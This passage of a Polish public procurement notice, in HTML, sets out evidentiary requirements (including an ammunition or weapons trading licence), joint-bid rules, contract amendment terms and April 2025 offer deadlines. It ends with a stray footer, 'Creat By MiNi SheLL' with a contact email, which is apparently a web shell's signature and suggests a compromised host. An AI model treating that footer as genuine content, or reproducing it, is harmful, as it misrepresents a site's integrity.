udziału w postępowaniu zgodnie z art. 112 ust. 2 pkt 2 i 4 ustawy w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów oraz zdolności technicznej lub zawodowej.<br/>Zamawiający oceni, czy Wykonawca spełnia warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 2 i 4 ustawy, dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów oraz zdolności technicznej lub zawodowej.<br/>Opis sposobu dokonywania oceny spełniania warunku zawarty został w Rozdziale 7 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykaz zrealizowanych dostaw, koncesja na obrót amunicją i/lub bronią (w zależności od złożonej oferty) ważna na terytorium Polski, karty katalogowe</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Szczegółowe informacje zawarte zostały w SWZ Rozdział 8. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Szczegółowe informacje zawarte zostały w SWZ Rozdział 8. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> polisa OC wraz z dowodem opłacenia składki ubezpieczeniowej do bieżącego okresu <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia Umowy w sprawie zamówienia publicznego.<br/>Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1. spełnienie warunków udziału w postępowaniu określonych w pkt 7.1 b) SWZ Wykonawcy wykazują łącznie,<br/>2. każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, nie może podlegać wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4, 5, 8, 9, 10.<br/>3. W przypadku, o którym mowa w art. 117 ust 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, składają oświadczenie, w formie zawartej w Formularzu ofertowym, z którego wynika, które elementy przedmiotu zamówienia wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana Umowy jest możliwa o ile zostanie przeprowadzona zgodnie z zasadami określonymi w art. 454 oraz art. 455 ustawy Prawo zamówień publicznych.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, a także w przypadku wystąpienia co najmniej jednej z okoliczności wskazanych poniżej:<br/>1)	zmiany nazwy, siedziby Wykonawcy,<br/>2)	zmiany przepisów aktów prawnych wymienionych w Umowie, a w szczególności:<br/>a)	Rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych),<br/>b)	ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>c)	ustawa z dnia 10 maja 2018 r. o ochronie danych osobowych,<br/>d)	ustawa z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych,<br/>e)	ustawa z dnia 29 sierpnia 1997 r. Ordynacja podatkowa.<br/>3)	zmiany podmiotu na rzecz którego ma być świadczony przedmiot Umowy oraz/lub jej zakresu w przypadku zmian organizacyjnych w strukturach podległych Ministerstwu Finansów,<br/>4)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu Umowy proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego i nie ograniczają przedmiotu Umowy, którego opis zawarty jest w Załączniku nr 3 do Umowy,<br/>5)	zmiany sposobu realizacji przedmiotu niniejszej Umowy, w następstwie działania siły wyższej . Jeżeli siła wyższa uniemożliwia lub przewiduje się, że uniemożliwi którejkolwiek ze Stron wykonanie przedmiotu Umowy bądź zobowiązań wynikających z Umowy, to Strona ta dołoży wszelkich starań, aby powiadomić drugą Stronę o zaistniałym zdarzeniu lub o okolicznościach i wyszczególni zobowiązania, których wykonanie będzie uniemożliwione w ich wyniku. Powiadomienie to zostanie przekazane w terminie 2 dni od momentu powzięcia wiedzy o wydarzeniach lub okolicznościach,<br/>6)	zmiany zakresu wykonania przedmiotu Umowy w przypadku wystąpienia działań osób trzecich uniemożliwiających wykonania obowiązków, za które to działania nie ponosi winy którakolwiek ze Stron Umowy,<br/>7)	zmiany zakresu realizacji przedmiotu Umowy z powodu zmiany prawa wewnętrznego i zewnętrznego oraz wytycznych Ministerstwa Finansów,<br/>8)	zmiany podwykonawcy, za uprzednią zgodą Zamawiającego oraz pod warunkiem zgodności z postanowieniami zawartymi w przedmiotowym postępowaniu,<br/>9)	zmiany stawki podatku od towarów i usług VAT.<br/>3.	Strony przewidują możliwość dokonywania zmian w treści Umowy w stosunku do treści oferty Wykonawcy w sytuacji gdy:<br/>1)	niezbędna jest zmiana sposobu wykonania zobowiązania, w tym terminu realizacji Umowy o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania Umowy,<br/>2)	realizacja przedmiotu Umowy wymaga uzyskania stosownych dokumentów z urzędów administracji państwowej, a z przyczyn niezależnych od Wykonawcy niemożliwe było uzyskanie tych dokumentów w terminach przewidzianych w przepisach prawa.<br/>4.	W przypadku, gdy którakolwiek ze Stron wyrazi wolę zmiany Umowy, Strona ta przedłoży drugiej Stronie pisemny wniosek o dokonanie takiej zmiany wraz z uzasadnieniem. Każda ze Stron będzie zobowiązana do rozważenia wniosku o zmianę, z tym zastrzeżeniem, że Wykonawca nie może odmówić zgody na wprowadzenie zmiany, bez podania na piśmie szczególnego istotnego powodu.<br/>5.	Wszelkie zmiany treści Umowy lub warunków Umowy lub uzupełnienia niniejszej Umowy w trakcie jej obowiązywania mogą nastąpić wyłącznie za zgodą Stron Umowy, w formie pisemnego aneksu, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com